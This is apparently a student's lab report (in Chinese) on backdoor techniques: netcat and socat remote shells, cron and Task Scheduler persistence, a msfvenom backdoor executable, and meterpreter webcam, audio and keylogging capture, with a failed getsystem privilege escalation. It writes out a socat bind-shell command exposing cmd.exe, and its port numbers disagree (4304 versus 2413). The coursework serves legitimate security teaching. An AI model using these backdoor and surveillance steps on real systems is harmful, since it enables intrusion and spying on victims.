20192413宗俊豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告
20192413 宗俊豪 2021-2022-2 《网络与系统攻防技术》实验二实验报告
1.实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.实验过程
2.1使用netcat获取主机操作Shell,cron启动某项任务
2.1.1 关闭防火墙
2.1.2 查询主机ip地址
2.1.3 windows 打开监听,Linux反弹连接win
2.1.4 在Windows的命令提示行中控制kali的shell,用crontab-e配置cron规则:* * * * * /root/桌面/test.py>>/root/桌面/a.log 2>&1 &
2.1.5 使用一个Python文件,内部只有print("hello")一条语句并用cron使其每分钟运行一次将结果记录在a.log中
2.2 使用socat获取主机操作Shell, 任务计划启动
2.2.1打开控制面板->系统和安全->管理工具->任务计划程序,新建任务计划
2.2.2新建触发器,设置为工作站锁定时,并启用
2.2.3新建操作,在程序或脚本中选择所下载的socat.exe文件路径,在添加参数中添加tcp-listen:4304 exec:cmd.exe,pty,stderr命令
这个命令可以把cmd.exe绑定到端口2413,同时把cmd.exe的stderr重定向到stdout上
2.2.4锁定计算机让新建的任务执行
2.2.5在kali中输入指令socat - tcp:192.168.10.233:2413,成功获取主机操作Shell
2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
2.3.1使用msfenom生成后门可执行文件
2.3.2使用ncat将生成的文件复制到windows中
2.3.3输入指令msfconsole启动用户操作界面
2.3.4设置payload,LHOST,LPORT与生成的20192413_backdoor.exe一致
2.3.5输入指令exploit执行监听,在windows中双击20192413_backdoor.exe,kali的监听进程将获得Win主机的主动连接,并得到远程控制shell
2.4 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
2.4.1获得目标主机的一段音频
2.4.2获取目标主机的摄像头拍照
2.4.3 输入指令keyscan_start获得目标主机的击键记录,keyscan_dump提取记录
2.4.4 输入指令getsystem提权
无法成功提权
2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.5.1将实验一中的pwn1-20192413文件输出为elf格式文件
2.5.2打开msf控制台设置Payload、LHOST、LPORT,与生成的20192413pwn文件一致
2.5.3打开exploit监听,并在另一个终端中打开20192413pwn文件可获得反弹连接shell
3.问题及解决方案
-
问题1:在主机双击生成的后门文件后,kali无法获取主机shell
-
问题1解决方案:生成后门文件时代码中LPORT打成了PORT导致后门文件无法正常使用,重新生成文件即可解决
-
问题2:在MSF客户操作界面使用exploit进行监听时提示exploit cammand not found
-
问题2解决方案:忘记打use exploit/multi/handler这条指令
-
问题3:在终端中打开20192413pwn文件时报错
-
问题3解决方案:在msf控制台设置payload时误将用于linux的payload设为用于windows的,重新设置linux后可正常运行
4.问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 后门一般会隐藏在正常应用程序之中,有的经过修改或破解的软件也会携带后门,有的系统制作者会在系统中故意留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- 诱骗客户点击、安装后自动启动
(3)Meterpreter有哪些给你映像深刻的功能?
- 每个功能都在之前没有使用过甚至见过,通过Meterpreter连接主机并控制主机摄像头的功能给我印象最深刻
(4)如何发现自己的系统有没有被安装后门?
- 自己可以通过杀毒软件来检测一部分后门,网上也有人通过自制入侵防御系统来发现系统异常
5.学习感悟、思考等
这次实验是对后门原理的实践,在实验中运用到了关于后门设置的一些内容以及netcat、socat和Meterpreter的使用,通过这次实验见识到了这三个软件的强大之处,同时也见识到了后门入侵主机摄像头、键盘输入的危害,对于今后计算机使用过程中可能存在的漏洞也更加警惕。在实验中需要通过关闭杀毒软件才能顺利进行,因此最简单的后门程序还是有很大的局限性,对于之后的免杀原理也有了更加浓厚的兴趣。